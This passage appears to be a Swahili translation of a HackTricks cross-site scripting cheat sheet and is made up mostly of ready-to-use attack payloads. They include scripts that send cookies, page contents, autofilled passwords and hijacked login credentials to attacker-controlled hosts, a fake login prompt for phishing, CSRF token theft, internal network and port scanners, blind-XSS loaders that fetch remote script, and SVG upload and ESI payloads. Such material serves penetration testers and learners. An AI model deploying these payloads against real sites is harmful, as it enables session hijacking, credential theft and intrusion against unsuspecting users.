<script>eval(atob('ZG9jdW1lbnQud3JpdGUoIjxpbWcgc3JjPSdodHRwczovLzxTRVJWRVJfSVA+P2M9IisgZG9jdW1lbnQuY29va2llICsiJyAvPiIp'));</script>
<script>fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body:document.cookie});</script>
<script>navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.cookie)</script>

tip

Hutaweza kupata cookies kutoka kwa JavaScript ikiwa flag ya HTTPOnly imewekwa kwenye cookie. Lakini hapa una njia kadhaa za kuipita ulinzi huu ikiwa una bahati.

Kunyakua Maudhui ya Ukurasa

javascript

var url = "http://10.10.10.25:8000/vac/a1fbf2d1-7c3f-48d2-b0c3-a205e54e09e8"
var attacker = "http://10.10.14.8/exfil"
var xhr = new XMLHttpRequest()
xhr.onreadystatechange = function () {
if (xhr.readyState == XMLHttpRequest.DONE) {
fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
}
}
xhr.open("GET", url, true)
xhr.send(null)

Tafuta IPs za ndani

html

<script>
var q = []
var collaboratorURL =
"http://5ntrut4mpce548i2yppn9jk1fsli97.burpcollaborator.net"
var wait = 2000
var n_threads = 51

// Prepare the fetchUrl functions to access all the possible
for (i = 1; i <= 255; i++) {
q.push(
(function (url) {
return function () {
fetchUrl(url, wait)
}
})("http://192.168.0." + i + ":8080")
)
}

// Launch n_threads threads that are going to be calling fetchUrl until there is no more functions in q
for (i = 1; i <= n_threads; i++) {
if (q.length) q.shift()()
}

function fetchUrl(url, wait) {
console.log(url)
var controller = new AbortController(),
signal = controller.signal
fetch(url, { signal })
.then((r) =>
r.text().then((text) => {
location =
collaboratorURL +
"?ip=" +
url.replace(/^http:\/\//, "") +
"&code=" +
encodeURIComponent(text) +
"&" +
Date.now()
})
)
.catch((e) => {
if (!String(e).includes("The user aborted a request") && q.length) {
q.shift()()
}
})

setTimeout((x) => {
controller.abort()
if (q.length) {
q.shift()()
}
}, wait)
}
</script>

Port Scanner (fetch)

javascript

const checkPort = (port) => { fetch(http://localhost:${port}, { mode: "no-cors" }).then(() => { let img = document.createElement("img"); img.src = http://attacker.com/ping?port=${port}; }); } for(let i=0; i<1000; i++) { checkPort(i); }

Port Scanner (websockets)

python

var ports = [80, 443, 445, 554, 3306, 3690, 1234];
for(var i=0; i<ports.length; i++) {
var s = new WebSocket("wss://192.168.1.1:" + ports[i]);
s.start = performance.now();
s.port = ports[i];
s.onerror = function() {
console.log("Port " + this.port + ": " + (performance.now() -this.start) + " ms");
};
s.onopen = function() {
console.log("Port " + this.port+ ": " + (performance.now() -this.start) + " ms");
};
}

Nyakati fupi zinaonyesha port inayojibu Nyakati ndefu zinaonyesha hakuna jibu.

Pitia orodha ya ports zilizozuiwa katika Chrome here na katika Firefox here.

Sanduku la kuomba credentials

html

<style>::placeholder { color:white; }</style><script>document.write("<div style='position:absolute;top:100px;left:250px;width:400px;background-color:white;height:230px;padding:15px;border-radius:10px;color:black'><form action='https://example.com/'><p>Your sesion has timed out, please login again:</p><input style='width:100%;' type='text' placeholder='Username' /><input style='width: 100%' type='password' placeholder='Password'/><input type='submit' value='Login'></form><p><i>This login box is presented using XSS as a proof-of-concept</i></p></div>")</script>

Kukamata Auto-fill passwords

javascript

<b>Username:</><br>
<input name=username id=username>
<b>Password:</><br>
<input type=password name=password onchange="if(this.value.length)fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">

When any data is introduced in the password field, the username and password is sent to the attackers server, even if the client selects a saved password and don't write anything the credentials will be ex-filtrated.

Hijack form handlers to exfiltrate credentials (const shadowing)

Iwapo handler muhimu (mfano, function DoLogin(){...}) itatangazwa baadaye kwenye ukurasa, na payload yako ikafanya kazi mapema (mfano, via an inline JS-in-JS sink), tengeneza const yenye jina lile kwanza ili kuchukua nafasi na kufunga handler. Matangazo ya function baadaye hayawezi rebind jina la const, na hivyo kuiacha hook yako ikidhibiti:

javascript

const DoLogin = () => {
const pwd  = Trim(FormInput.InputPassword.value);
const user = Trim(FormInput.InputUtente.value);
fetch('https://attacker.example/?u='+encodeURIComponent(user)+'&p='+encodeURIComponent(pwd));
};

Notes

Hii inategemea mpangilio wa utekelezaji: injection yako lazima itekelezwe kabla ya tamko halali.
Iwapo payload yako imefungwa ndani ya eval(...), vifungo vya const/let havitakuwa globals. Tumia mbinu ya dinamik <script> injection kutoka katika sehemu “Deliverable payloads with eval(atob()) and scope nuances” ili kuhakikisha true global, non-rebindable binding.
Wakati vichujio vya maneno muhimu vinazuia msimbo, changanya na Unicode-escaped identifiers au eval(atob('...')) delivery, kama ilivyoonyeshwa hapo juu.

Keylogger

Just searching in github I found a few different ones:

https://github.com/JohnHoder/Javascript-Keylogger
https://github.com/rajeshmajumdar/keylogger
https://github.com/hakanonymos/JavascriptKeylogger
You can also use metasploit http_javascript_keylogger

Stealing CSRF tokens

javascript

<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/email',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/email/change-email', true);
changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>

Kuiba ujumbe za PostMessage

html

<img src="https://attacker.com/?" id=message>
<script>
window.onmessage = function(e){
document.getElementById("message").src += "&"+e.data;
</script>

html

"><img src='//domain/xss'>
"><script src="//domain/xss.js"></script>
><a href="javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">Click Me For An Awesome Time</a>
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//0mnb1tlfl5x4u55yfb57dmwsajgd42.burpcollaborator.net/scriptb");a.send();</script>

<!-- html5sec - Self-executing focus event via autofocus: -->
"><input onfocus="eval('d=document; _ = d.createElement(\'script\');_.src=\'\/\/domain/m\';d.body.appendChild(_)')" autofocus>

<!-- html5sec - JavaScript execution via iframe and onload -->
"><iframe onload="eval('d=document; _=d.createElement(\'script\');_.src=\'\/\/domain/m\';d.body.appendChild(_)')">

<!-- html5sec - SVG tags allow code to be executed with onload without any other elements. -->
"><svg onload="javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')" xmlns="http://www.w3.org/2000/svg"></svg>

<!-- html5sec -  allow error handlers in <SOURCE> tags if encapsulated by a <VIDEO> tag. The same works for <AUDIO> tags  -->
"><video><source onerror="eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">

<!--  html5sec - eventhandler -  element fires an "onpageshow" event without user interaction on all modern browsers. This can be abused to bypass blacklists as the event is not very well known.  -->
"><body onpageshow="eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">

<!-- xsshunter.com - Sites that use JQuery -->
<script>$.getScript("//domain")</script>

<!-- xsshunter.com - When <script> is filtered -->
"><img src=x id=payload&#61;&#61; onerror=eval(atob(this.id))>

<!-- xsshunter.com - Bypassing poorly designed systems with autofocus -->
"><input onfocus=eval(atob(this.id)) id=payload&#61;&#61; autofocus>

<!-- noscript trick -->
<noscript><p title="</noscript><img src=x onerror=alert(1)>">

<!-- whitelisted CDNs in CSP -->
"><script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.6.1/angular.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.1/angular.min.js"></script>
<!-- ... add more CDNs, you'll get WARNING: Tried to load angular more than once if multiple load. but that does not matter you'll get a HTTP interaction/exfiltration :-]... -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>

<!-- Payloads from https://www.intigriti.com/researchers/blog/hacking-tools/hunting-for-blind-cross-site-scripting-xss-vulnerabilities-a-complete-guide -->
<!-- Image tag -->
'"><img src="x" onerror="eval(atob(this.id))" id="Y29uc3QgeD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0ne1NFUlZFUn0vc2NyaXB0LmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgpOw==">

<!-- Input tag with autofocus -->
'"><input autofocus onfocus="eval(atob(this.id))" id="Y29uc3QgeD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0ne1NFUlZFUn0vc2NyaXB0LmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgpOw==">

<!-- In case jQuery is loaded, we can make use of the getScript method -->
'"><script>$.getScript("{SERVER}/script.js")</script>

<!-- Make use of the JavaScript protocol (applicable in cases where your input lands into the "href" attribute or a specific DOM sink) -->
javascript:eval(atob("Y29uc3QgeD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0ne1NFUlZFUn0vc2NyaXB0LmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgpOw=="))

<!-- Render an iframe to validate your injection point and receive a callback -->
'"><iframe src="{SERVER}"></iframe>

<!-- Bypass certain Content Security Policy (CSP) restrictions with a base tag -->
<base href="{SERVER}" />

<!-- Make use of the meta-tag to initiate a redirect -->
<meta http-equiv="refresh" content="0; url={SERVER}" />

<!-- In case your target makes use of AngularJS -->
{{constructor.constructor("import('{SERVER}/script.js')")()}}

Regex - Kufikia Maudhui Yaliyofichwa

Kutoka kwa this writeup inawezekana kujifunza kwamba hata kama baadhi ya values zinafifia kutoka JS, bado inawezekana kuziona kwenye JS attributes katika objects tofauti. Kwa mfano, input ya REGEX bado inaweza kupatikana hata baada value ya input ya regex kuondolewa:

javascript

// Do regex with flag
flag = "CTF{FLAG}"
re = /./g
re.test(flag)

// Remove flag value, nobody will be able to get it, right?
flag = ""

// Access previous regex input
console.log(RegExp.input)
console.log(RegExp.rightContext)
console.log(
document.all["0"]["ownerDocument"]["defaultView"]["RegExp"]["rightContext"]
)

Brute-Force List

Auto_Wordlists/wordlists/xss.txt at main \xc2\xb7 carlospolop/Auto_Wordlists \xc2\xb7 GitHub

XSS Kutumia udhaifu mwingine

XSS katika Markdown

Je, unaweza inject code za Markdown zitakazoonyeshwa na renderer? Labda unaweza kupata XSS! Angalia:

XSS in Markdown

XSS hadi SSRF

Umepata XSS kwenye site inayotumia caching? Jaribu kuiboresha hadi SSRF kupitia Edge Side Include Injection kwa payload hii:

python

<esi:include src="http://yoursite.com/capture" />

Use it to bypass cookie restrictions, XSS filters and much more!
Taarifa zaidi kuhusu mbinu hii hapa: XSLT.

XSS katika PDF zinazotengenezwa kwa wakati wa utekelezaji

Ikiwa ukurasa wa wavuti unaunda PDF kwa kutumia input inayodhibitiwa na mtumiaji, unaweza kujaribu trick the bot anayetengeneza PDF ili executing arbitrary JS code.
Hivyo, ikiwa PDF creator bot finds aina fulani ya HTML tags, itayatafsiri, na unaweza abuse tabia hii kusababisha Server XSS.

Server Side XSS (Dynamic PDF)

Ikiwa huwezi inject HTML tags inaweza kuwa vyema kujaribu inject PDF data:

PDF Injection

XSS katika Amp4Email

AMP, inayolenga kuharakisha utendaji wa kurasa za wavuti kwenye vifaa vya rununu, inaunganisha HTML tags zilizoambatanishwa na JavaScript ili kuhakikisha utendakazi kwa msisitizo wa kasi na usalama. Inasaidia aina mbalimbali za components kwa vipengele tofauti, vinavyopatikana kupitia AMP components.

Muundo wa AMP for Email unapanua components maalum za AMP kwa emails, ukiruhusu wapokeaji kuingiliana na yaliyomo moja kwa moja ndani ya emails zao.

Mfano writeup XSS in Amp4Email in Gmail.

XSS wakati wa kupakia faili (svg)

Pakia kama picha faili kama ifuatayo (kutoka http://ghostlulz.com/xss-svg/):

html

Content-Type: multipart/form-data; boundary=---------------------------232181429808
Content-Length: 574
-----------------------------232181429808
Content-Disposition: form-data; name="img"; filename="img.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert(1);
</script>
</svg>
-----------------------------232181429808--

html

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<script type="text/javascript">alert("XSS")</script>
</svg>

html

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS");
</script>
</svg>

svg

<svg width="500" height="500"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<circle cx="50" cy="50" r="45" fill="green"
id="foo"/>

<foreignObject width="500" height="500">
<iframe xmlns="http://www.w3.org/1999/xhtml" src="data:text/html,&lt;body&gt;&lt;script&gt;document.body.style.background=&quot;red&quot;&lt;/script&gt;hi&lt;/body&gt;" width="400" height="250"/>
<iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:document.write('hi');" width="400" height="250"/>
</foreignObject>
</svg>

html

<svg><use href="//portswigger-labs.net/use_element/upload.php#x" /></svg>

xml

<svg><use href="data:image/svg+xml,&lt;svg id='x' xmlns='http://www.w3.org/2000/svg' &gt;&lt;image href='1' onerror='alert(1)' /&gt;&lt;/svg&gt;#x" />

Pata zaidi SVG payloads katika https://github.com/allanlw/svg-cheatsheet

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.